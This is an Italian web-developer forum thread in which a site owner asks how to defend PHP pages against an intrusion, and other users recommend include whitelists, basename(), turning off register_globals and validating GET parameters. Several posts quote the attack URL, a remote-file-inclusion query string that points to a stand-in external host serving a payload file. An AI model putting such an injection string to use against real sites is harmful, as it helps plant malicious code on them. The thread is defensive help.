Pagina 1 di 2 1 2 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 12
  1. #1

    protezione sql injection

    ciao,
    vorrei sapere come fare a proteggersi da intrusioni tipo

    pagina.php?art=valorenumerico/index.php?act=http://urlesternoperintrusione/pagina.txt

    normalmente utilizzavo mysql_escape_string, ma in questo caso non serve, c'è un modo concreto per proteggere le pagine?

    grazie
    Manifesto Aggiornato
    Sono proprietà privata di Reika

  2. #2
    E' sufficiente utilizzare una whitelist per eventuali chiamate ad include/require che utilizzano i dati di input per selezionare il file da includere oppure utilizzare funzioni tipo basename() per assicurarsi che il file che verrà incluso sia locale e non remoto.

  3. #3
    non ci siamo capiti, il valore GET io lo passo ad una query, a tale valore, per cercare di bucare il sito aggiungono questa parte /index.php?act=http://urlesternoperintrusione/pagina.txt[B]

    e tramite quel codice inseriscono i soliti js malevoli in fondo alla pagina principale (index.php)

    non richiamo file tramite get, sono loro che sfruttano il get per inserire i loro codici
    Manifesto Aggiornato
    Sono proprietà privata di Reika

  4. #4
    Utente di HTML.it L'avatar di dararag
    Registrato dal
    Jan 2008
    Messaggi
    434
    utilizzare post e mettere su off register_globals

  5. #5
    Utente di HTML.it
    Registrato dal
    Sep 2002
    Messaggi
    221
    utilizzi espressioni regolare per filtrare $_GET, per ogni campo verifica anche che sia del tipo che ti aspeti, ex valore intero, valore numerico, alfanumerico, link ecc ecc
    ciAo

  6. #6
    Potresti spiegarmi come fa la pagina index.php ad includere il codice malevoro a partire da una querystring contenente act=http://urlesternoperintrusione/pagina.txt ?

    L'unico metodo che mi viene in mente è tramite include/require o file_get_contents() oppure se il valore $_GET['act'] viene utilizzato nell'attributo SRC di IFRAME, SCRIPT etc.

    In tutti i casi menzionati, l'utilizzo di una whitelist o di basename() etc. dovrebbero aumentare sensibilmente la sicurezza dello script.

    Se conosci altri metodi per effettuare l'injection che non possono essere bloccati tramite whitelist/basename() desidererei tu li descrivessi.

  7. #7
    Utente di HTML.it
    Registrato dal
    Sep 2002
    Messaggi
    221
    Originariamente inviato da filippo.toso
    whitelist/basename()
    filippo scusa una domanda, ma cos intendi per whitelist? un elenco dei file "caricabili" ?
    ciAo

  8. #8
    filippo scusa una domanda, ma cos intendi per whitelist? un elenco dei file "caricabili" ?
    Si. Quando si utilizza include()/require() utilizzando dati di input (es. un parametro "action") sarebbe sempre opportuno istituire una whitelist (es. un array) da utilizzare per "autorizzare" l'include. In questo modo se un attaccante cerca di includere un file non elencato esplicitamente nella lista, l'include non verrà eseguito.

  9. #9
    Utente di HTML.it
    Registrato dal
    Sep 2002
    Messaggi
    221
    Originariamente inviato da filippo.toso
    Si. Quando si utilizza include()/require() utilizzando dati di input (es. un parametro "action") sarebbe sempre opportuno istituire una whitelist (es. un array) da utilizzare per "autorizzare" l'include. In questo modo se un attaccante cerca di includere un file non elencato esplicitamente nella lista, l'include non verrà eseguito.
    ok grazie!
    ciAo

  10. #10
    Originariamente inviato da filippo.toso
    Potresti spiegarmi come fa la pagina index.php ad includere il codice malevoro a partire da una querystring contenente act=http://urlesternoperintrusione/pagina.txt ?

    L'unico metodo che mi viene in mente è tramite include/require o file_get_contents() oppure se il valore $_GET['act'] viene utilizzato nell'attributo SRC di IFRAME, SCRIPT etc.

    In tutti i casi menzionati, l'utilizzo di una whitelist o di basename() etc. dovrebbero aumentare sensibilmente la sicurezza dello script.

    Se conosci altri metodi per effettuare l'injection che non possono essere bloccati tramite whitelist/basename() desidererei tu li descrivessi.
    non ne ho idea, ma secondo il mio provider (e guardando i log hanno ragione, coincide l'ora dell'ultima modifica) è il metodo con cui mi hanno inserito un codice php che stampa un js malevolo

    non ho valori $_GET['act'] nel mio codice

    comunqu mi informo sulle funzioni che hai menzionato
    Manifesto Aggiornato
    Sono proprietà privata di Reika

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.